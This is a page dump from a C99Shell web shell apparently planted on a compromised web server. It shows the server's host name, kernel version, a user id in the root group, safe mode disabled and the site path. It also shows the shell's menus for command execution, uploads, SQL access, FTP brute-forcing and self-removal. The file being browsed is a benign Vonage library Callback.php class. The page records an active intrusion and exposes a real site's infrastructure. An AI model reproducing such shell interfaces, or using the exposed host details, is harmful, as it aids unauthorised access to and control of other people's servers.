!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/vonage/client-core/src/Client/Callback/   drwxr-xr-x
Free 28.79 GB of 117.98 GB (24.4%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Callback.php (1.21 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Vonage\Client\Callback;

use 
InvalidArgumentException;
use 
RuntimeException;

use function 
array_diff;
use function 
array_keys;
use function 
array_merge;
use function 
implode;
use function 
strtolower;

class 
Callback implements CallbackInterface
{
    public const 
ENV_ALL 'all';
    public const 
ENV_POST 'post';
    public const 
ENV_GET 'get';

    protected array 
$expected = [];

    protected array 
$data;

    public function 
__construct(array $data)
    {
        
$keys array_keys($data);
        
$missing array_diff($this->expected$keys);

        if (
$missing) {
            throw new 
RuntimeException('missing expected callback keys: ' implode(', '$missing));
        }

        
$this->data $data;
    }

    public function 
getData(): array
    {
        return 
$this->data;
    }

    public static function 
fromEnv(string $source self::ENV_ALL): callable|Callback
    
{
        
$data = match (strtolower($source)) {
            
'post' => $_POST,
            
'get' => $_GET,
            
'all' => array_merge($_GET$_POST),
            default => throw new 
InvalidArgumentException('invalid source: ' $source),
        };

        return new static(
$data);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--